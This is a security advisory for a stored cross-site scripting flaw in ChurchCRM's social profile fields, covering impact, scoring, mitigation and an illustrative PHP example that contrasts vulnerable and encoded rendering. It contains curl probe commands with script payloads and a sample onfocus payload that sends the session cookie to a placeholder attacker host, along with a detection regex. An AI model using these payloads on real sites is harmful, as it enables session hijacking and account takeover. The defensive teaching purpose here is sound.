7.1.1
A stored cross-site scripting (XSS) vulnerability exists in ChurchCRM versions 0.0.0 through 7.0. This flaw allows non-administrative users with EditSelf permission to inject malicious JavaScript into their Facebook, LinkedIn, and X profile fields. Exploitation results in session cookie exfiltration, potentially compromising administrator accounts and sensitive church data. The vulnerability is resolved in version 7.1.0.
The impact of this XSS vulnerability is significant due to the potential for session hijacking. An attacker can craft a malicious payload that, when viewed by other users (including administrators), executes JavaScript code. This code can then steal the victim's session cookies, granting the attacker unauthorized access to their account. Given ChurchCRM's function as a church management system, sensitive data such as member information, financial records, and internal communications could be at risk. The chaining of onfocus event handlers across multiple fields to bypass length restrictions demonstrates a degree of sophistication, suggesting a potential for targeted attacks.
This vulnerability was publicly disclosed on 2026-04-07. While no public proof-of-concept (PoC) has been released, stored XSS in a free-text profile field is simple to reproduce once the affected fields are known, so one could emerge quickly. The CVSS base score of 8.9 (High) describes severity, not likelihood of exploitation; the EPSS estimate for this CVE is low (0.04%, 12th percentile). It is not currently listed in the CISA KEV catalog.
Churches and religious organizations using ChurchCRM versions 0.0.0 through 7.0 are at risk. This includes organizations that rely on ChurchCRM for managing member data, donations, and other sensitive information. Shared hosting environments where multiple ChurchCRM instances reside on the same server could amplify the impact if one instance is compromised.
• php / web:
curl -I 'http://churchcrm/person.php?id=1&facebook=<script>alert(1)</script>' | grep -i content-type
• generic web:
curl -s 'http://churchcrm/person.php?id=1&facebook=<script>alert(1)</script>' | grep alert
Both commands only test whether a query parameter is reflected into the response; they do not reproduce a stored flaw. A reliable check is to log in as a non-administrative user who has EditSelf permission, save a payload in the Facebook, LinkedIn or X profile field, and then load the profile page to see whether the value is emitted unescaped. The person.php path and the facebook parameter name in these commands are not confirmed by the advisory and should be adjusted to the actual install.
Exploitation status
EPSS: 0.04% (12th percentile)
The primary mitigation is to upgrade ChurchCRM to version 7.1.0 or later, which contains the fix for this vulnerability. If upgrading immediately is not feasible, consider temporary workarounds. Web application firewalls (WAFs) can be configured to filter suspicious JavaScript in profile-field submissions, but treat this as a stopgap: the reported payloads are short attribute-breakout fragments (onfocus handlers split across fields to stay within length limits), which naive script-tag signatures will miss. The durable fix is server-side output encoding of every profile value at the point where it is written into HTML, with input validation (for example, requiring a well-formed URL or handle for social fields) as a second layer. Regularly review ChurchCRM permissions to ensure that EditSelf is granted only to users who need it. After upgrading, confirm the fix by saving a simple payload in a social profile field as a user with EditSelf permission and verifying that it is rendered as inert text rather than executed.
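The following PHP is an added illustration of the failure mode described above and of the output-encoding fix; it is not ChurchCRM's code and does not reproduce the project's templates. The field names, the page layout, the attacker host and the payload are all constructed for the example; the payload is a generic attribute-breakout pattern of the onfocus shape the advisory mentions, not the reporter's payload. The last function is the kind of post-upgrade check a practitioner can run over a fetched profile page.

```php
<?php
// Added example, not ChurchCRM code. Shows a stored-XSS render pattern
// (untrusted profile value concatenated into an HTML attribute) next to the
// hardened version, plus a check that can be run over rendered markup.
declare(strict_types=1);

// Constructed attacker input: closes the value="" attribute, then adds an
// autofocus + onfocus handler that exfiltrates the session cookie. Short enough
// to fit a length-limited field. The attacker host is a placeholder.
const ATTACK = '" autofocus onfocus="fetch(\'//attacker.invalid/?c=\'+document.cookie)';

/** Vulnerable pattern: profile values are concatenated straight into HTML. */
function render_profile_vulnerable(array $profile): string
{
    $html = '<form>';
    foreach ($profile as $field => $value) {
        $html .= '<input name="' . $field . '" value="' . $value . '">';
    }
    return $html . '</form>';
}

/** Hardened pattern: every untrusted value is attribute-encoded at output time. */
function render_profile_fixed(array $profile): string
{
    $html = '<form>';
    foreach ($profile as $field => $value) {
        $html .= '<input name="' . esc($field) . '" value="' . esc($value) . '">';
    }
    return $html . '</form>';
}

/**
 * ENT_QUOTES encodes both " and ', so a stored value can never terminate the
 * attribute it is placed in; ENT_SUBSTITUTE avoids returning an empty string
 * (and silently dropping content) on invalid UTF-8.
 */
function esc(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5 | ENT_SUBSTITUTE, 'UTF-8');
}

/**
 * Post-upgrade check over rendered markup: a correctly encoded value can never
 * produce a live on*="..." attribute, because the quote that would open it is
 * emitted as &quot;. Returns true when such a handler attribute is present.
 */
function has_event_handler_attribute(string $html): bool
{
    return preg_match('/\s+on[a-z]+\s*=\s*["\']/i', $html) === 1;
}

// Constructed profile: one hostile field, two benign ones.
$profile = [
    'facebook' => ATTACK,
    'linkedin' => 'https://www.linkedin.com/in/example',
    'twitter'  => '@example',
];

$vulnerable = render_profile_vulnerable($profile);
$fixed      = render_profile_fixed($profile);

printf("vulnerable render carries an event handler: %s\n",
    has_event_handler_attribute($vulnerable) ? 'yes' : 'no');
printf("fixed render carries an event handler:      %s\n",
    has_event_handler_attribute($fixed) ? 'yes' : 'no');
echo $fixed, PHP_EOL;
```

The check deliberately looks for the handler attribute rather than for the literal payload, so it also catches variants the attacker splits across several fields. Encoding at output is the fix; marking the session cookie HttpOnly does not stop the script from running but does take the cookie-exfiltration outcome described in this advisory off the table, so it is worth confirming on the same deployment.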
Upgrade ChurchCRM to version 7.1.0 or later to mitigate the XSS vulnerability. This update fixes the issue by properly sanitizing user input in the social profile fields, preventing the injection of malicious code.
CVE-2026-39328 is a stored cross-site scripting vulnerability affecting ChurchCRM versions 0.0.0 through 7.0, allowing attackers to inject malicious JavaScript into user profiles.
If you are using ChurchCRM versions 0.0.0 through 7.0, you are potentially affected by this vulnerability. Upgrade to version 7.1.0 or later to mitigate the risk.
The recommended fix is to upgrade ChurchCRM to version 7.1.0 or later. Consider WAF rules and input validation as temporary workarounds if immediate upgrade is not possible.
While no active exploitation has been confirmed, the vulnerability's severity and ease of exploitation suggest a potential for future attacks.
Refer to the ChurchCRM website and security advisories for the latest information and updates regarding CVE-2026-39328.